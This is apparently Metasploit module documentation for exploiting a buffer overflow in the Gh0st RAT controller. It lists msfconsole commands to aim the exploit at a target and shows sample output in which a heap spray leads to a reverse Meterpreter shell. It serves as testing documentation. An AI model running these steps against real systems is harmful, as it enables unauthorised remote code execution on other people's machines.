c336daec8d
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution ## Verification Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing. - [ ] use exploit/windows/misc/gh0st - [ ] set RHOST [ip of target] - [ ] exploit Sample output: ``` msf > use exploit/windows/misc/gh0st msf exploit(gh0st) > set rhost 192.168.161.128 rhost => 192.168.161.128 msf exploit(gh0st) > exploit [*] Started reverse TCP handler on 192.168.161.1:4444 [*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6 [*] 192.168.161.128:80 - Spraying heap... [*] 192.168.161.128:80 - Trying command 103... [*] Sending stage (957487 bytes) to 192.168.161.128 [*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4